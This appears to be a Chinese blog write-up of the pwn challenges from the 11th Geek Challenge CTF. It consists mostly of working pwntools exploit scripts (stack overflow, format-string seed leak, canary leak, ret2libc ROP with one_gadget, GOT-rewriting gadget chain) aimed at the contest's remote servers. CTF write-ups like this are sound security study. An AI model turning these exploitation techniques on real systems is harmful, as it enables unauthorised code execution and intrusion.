0%

第十一届极客大挑战

5f9bb33bf22e7.jpg

现在转行还来的及吗?

这里特别感谢C1heck0ut师傅,师傅TQL,不嫌弃我菜,我给师傅拖后腿了。

pwn1:数学咋样?

话不多说,看到提示下载pwntools和ubuntu,直接手撕20个加法

1
nc 81.69.0.47 1111

得到flag

pwn2:liuzhuang-secret

栈溢出,程序有system(bin_sh)

1
2
3
4
5
6
7
8
9
10
11
#! /usr/bin/env python

from pwn import *
#sh=process('./pwn00')
sh=remote('81.69.0.47',1000)

system_addr=0x000000000040079B
payload='a'*0x70+'a'*8+p64(system_addr)
sh.sendline(payload)

sh.interactive()

pwn3:fmt

格式化字符串,首先泄露种子,然后猜对16次getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
#! /usr/bin/env python
from pwn import *
from ctypes import *

#sh=process('./fmt')
sh=remote('81.69.0.47',2222)
context.log_level='debug'
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
bss_addr=0x40409C

payload='%9$s'+'a'*4+p64(bss_addr)
sh.recvuntil('\n')
sh.sendline(payload)

seed=u64(sh.recv(4).ljust(8,'\x00'))
sh.success('seed : ' +hex(seed))

libc.srand(seed)

for i in range(16):
sleep(1)
sh.sendline(str(libc.rand()))

#gdb.attach(sh)
sh.interactive()

pwn4:runcode

写个c就好

1
2
3
4
5
6
7
8
9
10
#include<stdio.h>
#include<unistd.h>

int main(int arg, char **args)
{
char *argv[]={"cat","","/home/ctf/flag", NULL};

char *envp[]={0,NULL};
execve("/bin/cat",argv,envp);
}

pwn5:baby_canary

俩次输入的机会,第一次覆盖canary最后一个字节来泄露canary,第二次栈溢出跳到后门函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#! /usr/bin/env python
from pwn import *

#sh=process('./baby_canary')
sh=remote('81.69.0.47',3333)
elf=ELF('./baby_canary')
#context.log_level='debug'

bin_sh=0x00000000004008ED
system_plt=elf.plt['system']
pop_rdi=0x0000000000400873

sh.recvuntil('may be you know it,plz tell me.\n')
payload='a'*0x67+'b'+'a'
sh.send(payload)
sh.recvuntil('b')
canary=u64(sh.recv(8))-0x61
sh.success('canary : ' +hex(canary))

sleep(0.5)
payload='a'*0x68+p64(canary)+p64(0)+p64(pop_rdi)+p64(bin_sh)+p64(system_plt)
sh.sendline(payload)

sh.interactive()

pwn6:pwn111

ROP利用,简单题

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
#! /usr/bin/env python
from pwn import *

#sh=process('./pwn111')
sh=remote('81.69.0.47',1122)
elf=ELF('./pwn111')
libc=ELF('./libc')
context.log_level='debug'

pop_rdi=0x0000000000401233
pop_rsi_r15=0x0000000000401231
write_plt=elf.plt['write']
write_got=elf.got['write']
main_addr=0x0000000000401146

sh.recvuntil('please input: ')
payload='a'*0x80+'a'*8+p64(pop_rdi)+p64(1)+p64(pop_rsi_r15)+p64(write_got)+p64(0)+p64(write_plt)+p64(main_addr)
sh.sendline(payload)

write_addr=u64(sh.recv(6).ljust(8,'\x00'))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
sh.success('llibc_base : ' +hex(libc_base))
one_gadget=libc_base+0x4527a
sh.success('one_gadget : ' +hex(one_gadget))

payload='a'*0x80+'a'*8+p64(one_gadget)
sh.sendline(payload)

sh.interactive()

pwn7:pwn222

这里还是参考了riChar师傅的wp才弄懂,太菜了。

具体思路就是通过我们找到的这个gadget,修改read_got为write_got,然后泄露write_got,然后再将write_got修改回read_got,之后再跳回_start函数,最后就是one_gadget一把梭了。

1
add dword ptr [rbp - 0x3d], ebx ; nop ; ret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
#! /usr/bin/env python

from pwn import *

#sh=process('./pwn222')
sh=remote('81.69.0.47',2212)
elf=ELF('./pwn222')
libc=ELF('./libc')
context.log_level='debug'

read_got=elf.got['read']
read_plt=elf.plt['read']
pop_rbx_rbp_r12_r13_r14_r15_ret=0x000000000040122A
pop_rsi_r15_ret=0x0000000000401231
pop_rdi_ret=0x0000000000401233
add_ret=0x000000000040112c

payload='a'*0x28
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0x60)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
payload+=p64(pop_rdi_ret)
payload+=p64(0)
payload+=p64(pop_rsi_r15_ret)
payload+=p64(read_got)
payload+=p64(0)
payload+=p64(read_plt)
payload+=p64(pop_rbx_rbp_r12_r13_r14_r15_ret)
payload+=p64(0xFFFFFFFFFFFFFFA0)
payload+=p64(read_got+0x3d)
payload+=p64(0)*4
payload+=p64(add_ret)
payload+=p64(0x0000000000401060)
sh.sendline(payload)

write_addr=u64(sh.recv(8))
sh.success('write_addr : ' +hex(write_addr))
libc_base=write_addr-libc.symbols['write']
one_gadget=libc_base+0x4527a

payload2='a'*0x28+p64(one_gadget)
sh.sendline(payload2)
sh.interactive()